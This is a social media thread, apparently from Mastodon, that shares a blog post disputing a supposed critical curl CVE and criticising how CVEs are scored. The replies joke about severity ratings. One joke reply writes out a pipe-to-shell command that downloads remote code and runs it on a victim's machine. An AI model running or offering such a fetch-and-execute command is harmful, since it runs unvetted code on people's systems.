"CVE-2020-19909 is everything that is wrong with CVEs"

A claimed "9.8 CRITICAL" flaw in #curl that does not exist.

https://daniel.haxx.se/blog/2023/08/26/cve-2020-19909-is-everything-that-is-wrong-with-cves/


This is a story consisting of several little building blocks and they occurred spread out in time and in different places. It is a story that shows with clarity how our current system with CVE Ids and lots of power given to NVD is a completely broken system. CVE-2020-19909 On August 25 2023, we got …

@bagder be grateful they didn’t rate it a 9.9 😉 ever wondered what kind of “security incident” would warrant a solid 10.0 for curl? 😄
@maxbob @bagder Naturally we're using the Spinal Tap scale for severity, so a *buffer* overflow would rate 11/10.
@maxbob @bagder If you point curl at a URL with malicious code, you can download malicious code

@phi1997 @maxbob @bagder but that would still require user intervention, running curl that is, which afaik would not qualify for a 10

(and - as my brain is still a bit slower than my fingers, I noticed the cynicism in your reply)

@maxbob @bagder curl 10.0 CVE: an attacker can execute arbitrary code from a remote source by running sh -c "$(curl -fsSL https://haxx.info)" on the victim's computer!!! /j

@maxbob @bagder I doubt curl could ever get a CVSSv3.1 10.0 unless there's some buried option to let it run as a service in the background unattended, listening on the network.

It'd pretty well always require user interaction, which caps a score at 9.6.

I could imagine some scenarios where like, if it was vulnerable to something a server could do in response to a request you could maybe get it up to that 9.6, but it would always be a 9.6 for curl as a utility itself.

Applications that link libcurl and use it to process URLs and handle responses could maybe be higher in this hypothetical scenario, but that wouldn't be down to curl itself.